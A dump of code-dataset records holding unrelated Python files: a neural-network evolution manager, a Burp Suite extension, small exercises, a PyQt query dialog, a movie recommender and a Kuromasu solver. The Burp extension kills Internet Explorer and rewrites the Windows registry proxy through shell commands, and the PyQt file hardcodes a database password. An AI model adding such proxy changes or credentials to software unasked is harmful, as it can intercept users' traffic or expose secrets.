whiteModel[genStr + \"_\" + str(i)] = (\n load_model(folder + genStr + \"/white/modelFW_\" + genStr + \"_\" + str(i), compile=False),\n load_model(folder + genStr + \"/white/modelTW_\" + genStr + \"_\" + str(i), compile=False)\n )\n\n # model.predict() is not thread safe, so we have to compute the predict function here before creating threads\n for k in blackModel.keys():\n blackModel[k][0]._make_predict_function()\n blackModel[k][1]._make_predict_function()\n for k in whiteModel.keys():\n whiteModel[k][0]._make_predict_function()\n whiteModel[k][1]._make_predict_function()\n\n return blackModel, whiteModel\n\n\ndef loadLabels(folder):\n blackLabel = []\n whiteLabel = []\n\n blackLabel.append(pickle.loads(open(folder + \"label/labelFB\", \"rb\").read()))\n blackLabel.append(pickle.loads(open(folder + \"label/labelTB\", \"rb\").read()))\n\n whiteLabel.append(pickle.loads(open(folder + \"label/labelFW\", \"rb\").read()))\n whiteLabel.append(pickle.loads(open(folder + \"label/labelTW\", \"rb\").read()))\n\n return blackLabel, whiteLabel\n\n\ndef saveReport(folder, championship, generationNumber):\n with open(folder + \"report/report_\" + str(generationNumber) + \".txt\", \"w\") as reportFile:\n reportFile.write(\"Black with points:\\n\")\n # print also baseline scores\n champ = championship.black_with_points(False, \"baseline_net\")\n sortedChamp = sorted(champ.items(), key=lambda kv: kv[1], reverse=True)\n details = championship.black_with_score()\n i = 1\n for net in sortedChamp:\n reportFile.write(str(i) + \") \" + net[0] + \" \" + str(net[1]) + \" \" + str(details[net[0]]) + \"\\n\")\n i += 1\n\n reportFile.write(\"\\nWhite with points:\\n\")\n # print also baseline scores\n champ = championship.white_with_points(False, \"baseline_net\")\n sortedChamp = sorted(champ.items(), key=lambda kv: kv[1], reverse=True)\n details = championship.white_with_score()\n i = 1\n for net in sortedChamp:\n reportFile.write(str(i) + \") \" + net[0] + \" \" + str(net[1]) + \" \" + str(details[net[0]]) + \"\\n\")\n i += 1\n\n\ndef waitForThreads():\n mainThread = threading.currentThread()\n for t in threading.enumerate():\n if t is not mainThread:\n t.join()\n\n\ndef saveModels(folder, generation, blackNewModel, whiteNewModel):\n for k in blackNewModel.keys():\n blackNewModel[k][0].save(folder + str(generation) + \"/black/modelFB_\" + k)\n blackNewModel[k][1].save(folder + str(generation) + \"/black/modelTB_\" + k)\n\n for k in whiteNewModel.keys():\n whiteNewModel[k][0].save(folder + str(generation) + \"/white/modelFW_\" + k)\n whiteNewModel[k][1].save(folder + str(generation) + \"/white/modelTW_\" + k)\n\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-sgn\", \"--starting-generation-number\", required=True,\n help=\"the number of the first generation to consider\")\nap.add_argument(\"-nf\", \"--net-folder\", required=True,\n help=\"the folder containing the nets divided by generation number\")\nap.add_argument(\"-pn\", \"--players-number\", required=True, help=\"the number of players (nets) for every generation\")\nap.add_argument(\"-gn\", \"--generation-number\", required=True, help=\"how many generations have to be computed\")\n\nap.add_argument(\"-b\", \"--baseline\", required=True, help=\"1: use baseline championship, 0: use network championship\")\n# more arguments needed?\nargs = vars(ap.parse_args())\n\n# folder hierarchy:\n# neuralNetworks\n# labels\n# labelFB\n# labelTB\n# labelFW\n# labelTW\n# 0\n# black\n# modelFB_0_0\n# modelTB_0_0\n# ...\n# modelFB_0_49\n# modelTB_0_49\n# white\n# modelFW_0_0\n# ...\n# modelTW_0_49\n# 1\n# ...\n# ...\n# n\n# ...\n\nWHITEPORT = 5800\nBLACKPORT = 5801\n\nCROSSOVERRATE = 0.01\nMUTATIONRATE_INDIVIDUALS = 0.5\nMUTATIONRATE_NEURONS = 0.005\n\nfolder = args[\"net_folder\"]\nif folder[-1] != \"/\":\n folder += \"/\"\n\nstartingGenerationNumber = int(args[\"starting_generation_number\"])\nplayersNumber = int(args[\"players_number\"])\n\ngenerationNumber = int(args[\"generation_number\"])\n\n# load neural networks from the folder provided\nprint(\"[INFO] loading networks and label binarizers...\")\nblackModel, whiteModel = loadModels(folder, startingGenerationNumber, playersNumber)\nblackLabel, whiteLabel = loadLabels(folder)\n\nfor g in range(startingGenerationNumber, startingGenerationNumber + generationNumber):\n print(\"[INFO] generation number \" + str(g))\n\n # generate championship for this generation\n championship = Championship([str(g) + \"_\" + str(i) for i in range(playersNumber)])\n\n # matches: [(white player, black player), ...]\n # in this case: [('1_0', '1_29'), ('1_1', '1_28') ... ]\n matches = championship.all_matches()\n\n ##########################################################################\n # These lines are needed to reduce number of concurrent thread\n # if 'limited_match_per_time' all threads will start to execute asap\n limited_match_per_time = False\n # len(matches) = n ** 2, match_per_time >= 1 (at least 1 match)\n # match_per_time = sqrt(len(matches))\n match_per_time = 900\n num_current_match = 1\n ##########################################################################\n ##########################################################################\n # These lines are needed to manage the baseline player, which will be the\n # last player in the list, to do not create issues in the evolution step\n USE_BASELINE = int(args[\"baseline\"])\n # folder that contains moves that makes baseline lose against a net\n if USE_BASELINE and not os.path.isdir(folder + 'baseline_defeated_by/'):\n os.makedirs(folder + 'baseline_defeated_by/')\n baseline_net = '_' + str(playersNumber - 1)\n # remove all matches where the baseline does not play, and where both are baseline\n if USE_BASELINE:\n matches = [match\n for match in matches\n if (match[0][-len(baseline_net):] == baseline_net or match[1][-len(baseline_net):] == baseline_net)\n and not (match[0][-len(baseline_net):] == baseline_net\n and match[1][-len(baseline_net):] == baseline_net)]\n matches *= 5\n ##########################################################################\n\n # lock to correctly use Theano\n lock = threading.Lock()\n\n print(\"[INFO] playing \" + str(len(matches)) + \" matches...\")\n\n for m in matches:\n # white player created\n whitePlayer = m[0]\n baseline_player = False\n if USE_BASELINE and whitePlayer[-len(baseline_net):] == baseline_net:\n baseline_player = True\n modelFrom = whiteModel[whitePlayer][0]\n modelTo = whiteModel[whitePlayer][1]\n\n whiteThreadPlay = threading.Thread(target=connectAndPlay, args=(\n modelFrom, modelTo, whiteLabel[0], whiteLabel[1], whitePlayer, \"W\", WHITEPORT, championship, lock,\n baseline_player, folder + 'baseline_defeated_by/', m[1]))\n whiteThreadPlay.start()\n\n # black player created\n blackPlayer = m[1]\n baseline_player = False\n if USE_BASELINE and blackPlayer[-len(baseline_net):] == baseline_net:\n baseline_player = True\n modelFrom = blackModel[blackPlayer][0]\n modelTo = blackModel[blackPlayer][1]\n\n blackThreadPlay = threading.Thread(target=connectAndPlay, args=(\n modelFrom, modelTo, blackLabel[0], blackLabel[1], blackPlayer, \"B\", BLACKPORT, championship, lock,\n baseline_player, folder + 'baseline_defeated_by/', m[0]))\n blackThreadPlay.start()\n\n if limited_match_per_time:\n print(\"started match number: \" + str(num_current_match))\n if num_current_match % match_per_time == 0 or num_current_match == len(matches) - 1:\n waitForThreads()\n else:\n sleep(0.5)\n num_current_match += 1\n else:\n sleep(0.5)\n\n if not limited_match_per_time:\n waitForThreads()\n\n # print report\n saveReport(folder, championship, g)\n\n # evolution of the networks\n print(\"[INFO] evolving networks...\")\n\n blackNextGeneration = []\n if USE_BASELINE:\n blackModel = {key: value for key, value in blackModel.items() if key[-len(baseline_net):] != baseline_net}\n print(\"[INFO] evolving \" + str(len(blackModel.keys())) + \" nets ...\")\n blackThreadEvolve = threading.Thread(target=evolve, args=(\n blackModel, championship.black_with_points(USE_BASELINE, baseline_net), playersNumber // 10, CROSSOVERRATE,\n MUTATIONRATE_INDIVIDUALS, MUTATIONRATE_NEURONS, blackNextGeneration, lock, USE_BASELINE))\n blackThreadEvolve.start()\n\n whiteNextGeneration = []\n if USE_BASELINE:\n whiteModel = {key: value for key, value in whiteModel.items() if key[-len(baseline_net):] != baseline_net}\n whiteThreadEvolve = threading.Thread(target=evolve, args=(\n whiteModel, championship.white_with_points(USE_BASELINE, baseline_net), playersNumber // 10, CROSSOVERRATE,\n MUTATIONRATE_INDIVIDUALS, MUTATIONRATE_NEURONS, whiteNextGeneration, lock, USE_BASELINE))\n whiteThreadEvolve.start()\n\n waitForThreads()\n\n # cleaning previous loaded models\n blackModel.clear()\n for i in range(playersNumber):\n blackModel[str(g + 1) + \"_\" + str(i)] = (blackNextGeneration[i][0], blackNextGeneration[i][1])\n\n whiteModel.clear()\n for i in range(playersNumber):\n whiteModel[str(g + 1) + \"_\" + str(i)] = (whiteNextGeneration[i][0], whiteNextGeneration[i][1])\n\n # create new directories for the mutated neural networks\n os.makedirs(folder + str(g + 1) + \"/black/\")\n os.makedirs(folder + str(g + 1) + \"/white/\")\n\n print(\"[INFO] saving evolved networks...\")\n saveModelsThread = threading.Thread(target=saveModels, args=(folder, g + 1, blackModel, whiteModel))\n saveModelsThread.start()\n","sub_path":"src/evolution_manager.py","file_name":"evolution_manager.py","file_ext":"py","file_size_in_byte":10878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505901468","text":"from javax.swing import JPanel, JTextField, JButton, JLabel, BoxLayout\r\nfrom burp import IBurpExtender, ITab\r\n\r\nimport ctypes \r\nimport subprocess\r\n\r\nclass BurpExtender(IBurpExtender, ITab):\r\n def registerExtenderCallbacks(self, callbacks):\r\n self.callbacks = callbacks\r\n self.isEnabled = False\r\n callbacks.setExtensionName('app-traffic')\r\n callbacks.addSuiteTab(self)\r\n # Called on \"Enable\" button click to spin up the API Gateway\r\n def enableGateway(self, event):\r\n self.isEnabled = True\r\n self.set_sys_proxy(True)\r\n self.enable_button.setEnabled(False)\r\n self.target_host.setEnabled(False)\r\n self.disable_button.setEnabled(True)\r\n return\r\n # Called on \"Disable\" button click to delete API Gateway\r\n def disableGateway(self, event):\r\n self.isEnabled = False\r\n self.set_sys_proxy(False)\r\n self.enable_button.setEnabled(True)\r\n self.target_host.setEnabled(True)\r\n self.disable_button.setEnabled(False)\r\n return\r\n # Tab name\r\n def getTabCaption(self):\r\n return 'app-traffic'\r\n def set_key(self, ip, value): \r\n subprocess.Popen('taskkill /f /im iexplore.exe >nul 2>&1', shell=True)\r\n subprocess.Popen('reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /d \"'+str(ip)+'\" /f', shell=True)\r\n subprocess.Popen('reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d '+str(value)+' /f', shell=True)\r\n subprocess.Popen('ping -n 5 127.0.0.1 >nul', shell=True)\r\n subprocess.Popen('start iexplore.exe http://burp', shell=True)\r\n\r\n def set_sys_proxy(self,on_off):\r\n if on_off:\r\n self.set_key(self.target_host.text, 1) \r\n else:\r\n self.set_key('', 0) \r\n # Layout the UI\r\n def getUiComponent(self):\r\n self.panel = JPanel()\r\n self.main = JPanel()\r\n self.main.setLayout(BoxLayout(self.main, BoxLayout.Y_AXIS))\r\n self.target_host_panel = JPanel()\r\n self.main.add(self.target_host_panel)\r\n self.target_host_panel.setLayout(\r\n BoxLayout(self.target_host_panel, BoxLayout.X_AXIS))\r\n self.target_host_panel.add(JLabel('Listen Prot:'))\r\n self.target_host = JTextField('127.0.0.1:8080', 25)\r\n self.target_host_panel.add(self.target_host)\r\n self.buttons_panel = JPanel()\r\n self.main.add(self.buttons_panel)\r\n self.buttons_panel.setLayout(\r\n BoxLayout(self.buttons_panel, BoxLayout.X_AXIS))\r\n self.enable_button = JButton('Enable', actionPerformed= self.enableGateway)\r\n self.buttons_panel.add(self.enable_button)\r\n self.disable_button = JButton('Disable', actionPerformed= self.disableGateway)\r\n self.buttons_panel.add(self.disable_button)\r\n self.disable_button.setEnabled(False)\r\n self.panel.add(self.main)\r\n return self.panel\r\n","sub_path":"app-traffic.py","file_name":"app-traffic.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"576822574","text":"from collections import deque\n\npeople = deque()\ncommand = input()\nwhile not command == \"End\":\n if command == \"Paid\":\n while len(people) > 0:\n print(people.popleft())\n\n else:\n name = command\n people.append(name)\n command = input()\n\nprint(f\"{len(people)} people remaining.\")\n\n","sub_path":"advanced/stacks and queues/supermarket.py","file_name":"supermarket.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563492641","text":"cats = []\nwhile True:\n print('Gimme a name for cat ' + str(len(cats) + 1) + ' , then press Enter. Leave blank and press Enter to quit and write the list to an output file called cat-index.txt.')\n catName = input()\n cats = cats + [catName]\n if catName == '':\n break\n else:\n continue\n# this block of code takes the list and tells you the index of each cat name\nopen('cat-index.txt', 'w') # clears out contents of output file.\nfor i in range(len(cats)): # count how many cats are in list\n if cats[i] != '': # leaving the name blank and pressing enter creates a blank entry at the end of the list; this ignores the blank at the end of the list and prints the rest of the cat names. I could get the same result by deleting the -1 (last item) in the list \n print('Cat ' + cats[i] + ' is located at index ' + str(i) + '.') # prints list to file\n else: # when it runs out of cat names, print the following \n print('Those are all the cats. Nyan!')\nwhile True: # check to see if our actual cats are in the list\n if 'Liam' in cats:\n print('Why is Liam in the cat list?\\n')\n catCheck = ['Essie', 'Gary', 'Olive', 'Charlie', 'Mimi', 'Trixie']\n for i in range(len(cats)):\n if cats[i] != '':\n r = 0\n while r < int((len(catCheck))):\n try:\n cats.index(catCheck[r])\n except ValueError as e:\n print(e, file = open('./x-list.txt', 'a'))\n #exceptionList = []\n #exceptionList.append(e)\n #print(exceptionList)\n #print(exceptionList, file = open('./x-list.txt', 'a'))\n r = r + 1\n break \n \n \n \n # don't print exceptions as they occur. add them to a list and remove dupes and print list","sub_path":"DELETE method test.py","file_name":"DELETE method test.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"597072904","text":"from fb_post.models import Post\n\nfrom .validity import is_post_valid\n\nfrom .dict_post_details import get_dict_details_of_post\n\n#task - 13\ndef get_post(post_id):\n is_post_valid(post_id)\n\n post_obj = Post.objects\\\n .select_related('posted_by')\\\n .prefetch_related('comments', 'reaction', 'comments__reaction',\n 'comments__commented_by')\\\n .filter(id=post_id)\\\n .first()\n\n return get_dict_details_of_post(post_obj)\n","sub_path":"clean_code_submissions/clean_code_assignment_004/fb_post/utils/get_post.py","file_name":"get_post.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552474969","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2023/1/30 12:44\n# @Author : ZANWEB\n# @File : DfDailyQueryCode in PyCharm\n# @IDE : PyCharm\n# @Function :\nimport os\nimport subprocess\nimport sys\n\nimport pandas as pd\nfrom PyQt5.QtCore import pyqtSlot, QDate, Qt\nfrom PyQt5.QtWidgets import QApplication, QMessageBox, QDialog, QTableWidgetItem\nfrom copy import deepcopy\n\nfrom DBbase.dbFunctions import df_t_emp_read, t_mhr_read_tables\nfrom Df_Daily_Query_ui import DailyQueryUI\n\n\n# from PyQt5.QtGui import Qt\n\nclass DailyQuery(QDialog, DailyQueryUI):\n def __init__(self, _user_info):\n super(DailyQuery, self).__init__()\n\n self.emp_group_id = 1\n self.sort_order = None\n self.emp = None\n self.df = None\n self.user_info = _user_info\n\n self.setup_ui(self)\n self.data_init_()\n self.connect_()\n\n def data_init_(self):\n date = QDate.currentDate()\n first_day_of_month = QDate(date.year(), date.month(), 1)\n last_day_of_month = first_day_of_month.addDays(date.daysInMonth() - 1)\n self.edit_start.setDate(first_day_of_month)\n self.edit_end.setDate(last_day_of_month)\n emp = df_t_emp_read(self.user_info, ['id', 'name'])\n self.emp = emp\n emp = ['|'.join([str(x['id']), x['name'].strip()]) for x in emp]\n self.edit_emp.addItems(emp)\n self.edit_emp.clearEditText()\n\n def connect_(self):\n self.btn_query.clicked.connect(self.query)\n self.btn_excel.clicked.connect(self.export_excel)\n self.edit_start.dateChanged.connect(self.date_changed)\n self.edit_table.horizontalHeader().sectionClicked.connect(self.header_clicked)\n self.r_btn_group.buttonClicked[int].connect(self.on_r_btn_group_clicked)\n\n @pyqtSlot(int)\n def on_r_btn_group_clicked(self, id_):\n self.emp_group_id = id_\n # print(self.emp_group_id)\n\n @pyqtSlot(int)\n def header_clicked(self, index):\n # header = self.edit_table.horizontalHeader()\n # self.sort_order = header.sortIndicatorOrder()\n if self.sort_order == Qt.AscendingOrder:\n self.sort_order = Qt.DescendingOrder\n else:\n self.sort_order = Qt.AscendingOrder\n self.edit_table.sortByColumn(index, self.sort_order)\n\n @pyqtSlot()\n def export_excel(self):\n desktop = os.path.join(os.path.expanduser(\"~\"), 'Desktop')\n file_path = os.path.join(desktop, \"output.xlsx\")\n self.df.to_excel(file_path, index=False, engine='openpyxl')\n subprocess.Popen(file_path, shell=True)\n\n @pyqtSlot()\n def date_changed(self):\n start = self.edit_start.date()\n last = start.addDays(start.daysInMonth() - 1)\n self.edit_end.setDate(last)\n\n @pyqtSlot()\n def query(self):\n # query\n result_ = self.get_mhr()\n # 这里加入计算出的辅助工的mhr\n # print(result_)\n have_vendors = [x for x in result_ if (x['Vendors'] and (x['Vendors'] != 'None'))]\n if have_vendors:\n for have_vendor in have_vendors:\n vendors_ = []\n if have_vendor['Vendors'].find(','):\n vendors_ = have_vendor['Vendors'].split(',')\n else:\n vendors_[0] = have_vendor['Vendors']\n for vendor_ in vendors_:\n name_ = [x['name'] for x in self.emp if x['id'] == int(vendor_)]\n tmp_ = deepcopy(have_vendor)\n tmp_['Operator'] = name_[0]\n tmp_['主/辅'] = '辅'\n tmp_['有/无承包商辅助'] = 'N'\n tmp_['Vendors'] = ''\n result_.append(tmp_)\n\n if result_:\n # emp = df_t_emp_read(self.user_info, ['id', 'name'])\n # print(emp, result_)\n # emp_map = {item['id']:item['name'] for item in emp}\n\n # 这里再加入正式工/外包工的区分\n emp_formal = [x['name'] for x in self.emp if str(x['id']).startswith('80')]\n emp_informal = [x['name'] for x in self.emp if str(x['id']).startswith('70')]\n result_formal = [x for x in result_ if x['Operator'] in emp_formal]\n result_informal = [x for x in result_ if x['Operator'] in emp_informal]\n self.df = None\n if self.emp_group_id == 1:\n self.df = pd.DataFrame(result_)\n elif self.emp_group_id == 2:\n self.df = pd.DataFrame(result_formal)\n else:\n self.df = pd.DataFrame(result_informal)\n\n self.df = self.df.sort_values(by=['Date', 'Operator'], axis=0, ascending=[True, True])\n # df['emp'] = df['emp'].replace(emp_map)\n # 清空表格\n self.edit_table.clear()\n self.edit_table.setRowCount(0)\n self.edit_table.setColumnCount(0)\n # self.edit_table.sortByColumn(False)\n # 填充表格\n self.edit_table.setRowCount(self.df.shape[0])\n self.edit_table.setColumnCount(self.df.shape[1])\n self.edit_table.setHorizontalHeaderLabels(self.df.columns)\n for i in range(self.df.shape[0]):\n for j in range(self.df.shape[1]):\n item = QTableWidgetItem(str(self.df.iloc[i, j]))\n item.setTextAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.edit_table.setItem(i, j, item)\n self.edit_table.resizeColumnsToContents()\n self.edit_table.resizeRowsToContents()\n # self.edit_table.sortItems(0, Qt.DescendingOrder)\n # self.edit_table.sortByColumn(True)\n else:\n QMessageBox.warning(self, '警告:', '没有数据!')\n\n def get_mhr(self):\n start_ = self.edit_start.date().toPyDate().strftime('%Y-%m-%d')\n end_ = self.edit_end.date().toPyDate().strftime('%Y-%m-%d')\n if self.edit_emp.currentText():\n emp_no_ = self.edit_emp.currentText().split('|')[0]\n else:\n emp_no_ = ''\n\n result = t_mhr_read_tables(self.user_info, start_, end_, emp_no_)\n return result\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n user_info = {\n 'server': '127.0.0.1\\\\stlsojsvr04',\n 'database': 'DFactory',\n 'account': 'zyq',\n 'password': 'zyq123'\n }\n window = DailyQuery(user_info)\n window.show()\n sys.exit(app.exec())\n","sub_path":"DfDailyQueryCode.py","file_name":"DfDailyQueryCode.py","file_ext":"py","file_size_in_byte":6446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"319337569","text":"import os.path\nimport unittest\n\nfrom integration import *\n\nclass TestTests(IntegrationTest):\n def __init__(self, *args, **kwargs):\n IntegrationTest.__init__(\n self, os.path.join(examples_dir, '07_tests'), *args, **kwargs\n )\n\n @skip_if_backend('msbuild')\n def test_test(self):\n self.build('test')\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/integration/test_tests.py","file_name":"test_tests.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"276751622","text":"import random\nfrom core import audio_ivec_sim\nfrom core.database_manager import trailer_seen, personality\nfrom core import get_table\nfrom core import movie_pers\nfrom pandas import Series\nimport numpy\nimport operator\nimport math\n\n\ndef pers_rec(user_id,num_of_rec,num_of_skip,pers_type):\n movies_seen=trailer_seen.TrailerSeen.query.filter_by(seen_by=user_id)\n movies_to_exclude = []\n for r in movies_seen:\n movies_to_exclude.append(r.imdb_id)\n\n pers_user = personality.Personality.query.filter_by(user_id=user_id).first().TIPI_TO_OCEAN()\n final_array = []\n\n if pers_type == \"users\":\n pers_others = personality.Personality.query.filter(personality.Personality.user_id != user_id)\n\n for pers_other in pers_others:\n d = get_distance(pers_user, pers_other.TIPI_TO_OCEAN())\n movies_seen=trailer_seen.TrailerSeen.query.filter_by(seen_by=pers_other.user_id, is_skipped=0)\n for r in movies_seen:\n # problem when multiple users rated the same movie, it should prob aggregate the score\n final_array.append((r.imdb_id, float((1/d) * float(r.rate)), r.rate))\n else:\n for row in movie_pers.itertuples():\n d = get_distance(pers_user, [row.openness, row.conscientiousness, row.extraversion, row.agreeableness, row.emotional_range])\n final_array.append((row.IMDB_ID, 1/d, d))\n\n dtype = [('IMDB_ID', 'S10'), ('PREDICTED_VOTE', float), ('IMDB_VOTES', int)]\n\n numpy_final = numpy.array(final_array, dtype=dtype)\n numpy_final = numpy.sort(numpy_final, order=['PREDICTED_VOTE'])\n numpy_final = numpy_final[::-1]\n\n all_table = get_table(\"all_table\")()\n all_table = all_table[~all_table[\"IMDB_ID\"].isin(Series(movies_to_exclude))]\n all_table.reset_index(drop=True, inplace=True)\n\n final = {}\n\n safe_iter = 0\n\n while (len(final) < num_of_rec) and (safe_iter < 20) and len(numpy_final) > (safe_iter + num_of_skip):\n rec = numpy_final[safe_iter + num_of_skip]\n\n movie = all_table[all_table[\"IMDB_ID\"] == rec[0]].copy()\n if len(movie.index):\n movie.reset_index(drop=True, inplace=True)\n movie = movie.iloc[0]\n movie[\"REC_TYPE\"] = \"PERS\"\n movie[\"PREDICTED_VOTE\"]=rec[1]\n\n z = movie.to_json()\n safe_iter += 1\n final.update({len(final): z})\n else:\n safe_iter += 1\n\n return final\n\ndef get_distance(a,b):\n return math.sqrt((a[0]-b[0])**2 + (a[1]-b[1])**2 + (a[2]-b[2])**2 + (a[3]-b[3])**2 + (a[4]-b[4])**2)\n","sub_path":"core/rec_engine/pers_rec.py","file_name":"pers_rec.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"173339986","text":"class Kuromasu:\n\n def __init__(self,archivo_tablero):\n self.tablero=[]\n for linea in archivo_tablero:\n self.tablero.append(linea.split())\n self.celdas_blancas=[]\n self.celdas_numeradas=[]\n self.celdas_negras=[]\n for i in range(len(self.tablero)):\n for j in range(len(self.tablero)):\n if celda_ocupada(self.tablero,i,j) and self.tablero[i][j]!='X':\n self.celdas_numeradas.append([i,j])\n elif self.tablero[i][j]=='X':\n self.celdas_negras.append([i,j])\n\n def dibujarTablero(self):\n print('\\n')\n for i in range(len(self.tablero)):\n for j in range(len(self.tablero)):\n if [i,j] in self.celdas_negras:\n print(' ',chr(9679),' ',end='')\n elif [i,j] in self.celdas_numeradas:\n print(' ',chr(9311+int(self.tablero[i][j])),' ',end='')\n else:\n print(' ',chr(9675),' ',end='')\n print('\\n')\n print('\\n')\n\n def agregarNegra(self,i,j):\n if [int(i),int(j)] in self.celdas_numeradas:\n print('esa celda no puede pintarse de negro pues contiene un numero')\n sleep(2.3)\n elif not validar_celda_tablero(self.tablero,int(i),int(j)):\n print('esa posicion no pertenece al tablero(fuera de limites)')\n sleep(2.3)\n elif negras_adyacentes(self.celdas_negras,int(i),int(j)):\n print('dos negras no pueden estar juntas ni horizontal ni verticalmente')\n sleep(2.3)\n elif [int(i),int(j)] in self.celdas_negras:\n print('esa celda ya fue pintada')\n sleep(2.3)\n else:\n self.celdas_negras.append([int(i),int(j)])\n\n def revisarSolucion_regla1(self):\n for i in range(len(self.tablero)):\n for j in range(len(self.tablero)):\n if self.tablero[i][j]!='0' and self.tablero[i][j]!='X':\n celda_solucionada=False\n soluciones_celda=traducir_combinaciones_posibles(combinaciones_posibles(self.tablero,int(self.tablero[i][j])-1,generar_decisiones(self.tablero,i,j)))\n soluciones_inviables_segun_negros=[]\n for solucion in soluciones_celda:\n for celda in solucion:\n if celda in self.celdas_negras:\n soluciones_inviables_segun_negros.append(solucion)\n break\n if soluciones_inviables_segun_negros==soluciones_celda:\n return False\n lista_posibles_negras=solucion_celda(self.tablero,i,j)\n for posible_combinacion in lista_posibles_negras:\n for negra in posible_combinacion:\n if negra not in self.celdas_negras:\n break\n celda_solucionada=True\n if not celda_solucionada:\n return False\n return True\n\n def revisarSolucion_regla4(self,posicion=[0,0],blancas=[],i=0):\n vectores=[[1,0],[0,1],[-1,0],[0,-1]]\n if i==0:\n self.blancas_simulacion_regla4=[]\n for i in range(len(self.tablero)):\n for j in range(len(self.tablero)):\n if [i,j] not in self.celdas_negras:\n self.blancas_simulacion_regla4.append([i,j])\n if len(self.blancas_simulacion_regla4)==1 or len(self.blancas_simulacion_regla4)==0:\n return True\n celda_comienzo=self.blancas_simulacion_regla4[0]\n for vector in vectores:\n if [celda_comienzo[0]+vector[0],celda_comienzo[1]+vector[1]] in self.blancas_simulacion_regla4:\n if self.revisarSolucion_regla4([celda_comienzo[0]+vector[0],celda_comienzo[1]+vector[1]],self.blancas_simulacion_regla4,i+1):\n return True\n else:\n if posicion in blancas:\n eliminar_de_lista(blancas,posicion)\n if blancas==[]:\n return True\n for vector in vectores:\n if [posicion[0]+vector[0],posicion[1]+vector[1]] in self.blancas_simulacion_regla4:\n if self.revisarSolucion_regla4([posicion[0]+vector[0],posicion[1]+vector[1]],self.blancas_simulacion_regla4,i+1):\n return True\n return False\n\n def resolver(self,celdas_numeradas=[],solucion=[],blancas=(),i=0):\n if i==0:\n celdas_numeradas=self.celdas_numeradas\n #print(celdas_numeradas)\n solucion=[[]]*len(celdas_numeradas)\n if celdas_numeradas==[]:\n #print('caso baso solucion:',solucion)\n return True\n #print(solucion_celda(self.tablero,celdas_numeradas[0][0],celdas_numeradas[0][1]))\n for combinacion in solucion_celda(self.tablero,celdas_numeradas[0][0],celdas_numeradas[0][1]):\n legal=True\n for celda in combinacion:\n #print('celda:',celda)\n if celda in blancas:\n legal=False\n else:\n for negras in solucion[:i]:\n #print('sol:',solucion)\n #print(negras)\n if negras_adyacentes(negras,celda[0],celda[1]):\n legal=False\n #print('ad')\n for negras in solucion[:i]:\n for negra in negras:\n #print ('negra:',negra)\n #print('comb:',combinacion)\n #print(blancas_segun_solucion(self.tablero,celdas_numeradas[0][0],celdas_numeradas[0][1],combinacion))\n if negra in blancas_segun_solucion(self.tablero,celdas_numeradas[0][0],celdas_numeradas[0][1],combinacion):\n #print('in')\n legal=False\n #print('\\n')\n if legal:\n #print('comb:',combinacion)\n #print('legal')\n #print(celdas_numeradas[1:])\n #print(i)\n #print('\\n')\n blancas_lista=list(blancas)\n #print('comb:',combinacion)\n #print('blancas:',blancas)\n #print('sol:',solucion)\n #print(i,'\\n')\n blancas_lista+=(blancas_segun_solucion(self.tablero,celdas_numeradas[0][0],celdas_numeradas[0][1],combinacion))\n solucion[i]=combinacion\n if self.resolver(celdas_numeradas[1:],solucion,tuple(blancas_lista),i+1):\n return solucion\n #print('fail')\n #return []\n\n def traducirSolucion(self,solucion):\n traduccion=[]\n for combinacion in solucion:\n for negra in combinacion:\n if negra not in traduccion:\n traduccion.append(negra)\n return traduccion\n\n def volverEstado_inicial(self):\n self.celdas_blancas=[]\n self.celdas_numeradas=[]\n self.celdas_negras=[]\n for i in range(len(self.tablero)):\n for j in range(len(self.tablero)):\n if celda_ocupada(self.tablero,i,j) and self.tablero[i][j]!='X':\n self.celdas_numeradas.append([i,j])\n elif self.tablero[i][j]=='X':\n self.celdas_negras.append([i,j])\n\n def limpiarTablero(self):\n self.celdas_negras=[]\n\n#clases\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n#funciones\n\n\ndef eliminar_de_lista(lista,elemento): #elimina elemento de la lista, util para evitar errores si el elemento no esta\n if elemento in lista:\n #print('s')\n lista.pop(lista.index(elemento))\n\ndef celda_ocupada(tablero,i,j): #valida que la celda no este ocupada (True=ocupada, False=desocupada)\n if validar_celda_tablero(tablero,i,j):\n if tablero[i][j]!='0':\n return True\n return False\n\ndef validar_celda_tablero(tablero,i,j): #valida que la celda se encuentre dentro del tablero (True=dentro, False=fuera)\n if i<0 or j<0 or i>len(tablero)-1 or j>len(tablero[0])-1:\n return False\n return True\n\ndef negras_adyacentes(negras_actuales,i,j): #comprueba si las celdas adyacentes a [i,j] estan pintadas de negro\n if ([i+1,j] in negras_actuales) or ([i-1,j] in negras_actuales) or ([i,j+1] in negras_actuales) or ([i,j-1] in negras_actuales):\n return True\n return False\n\ndef generar_decisiones(tablero,i,j): #retorna todas las celdas que son \"alcanzables\" por la 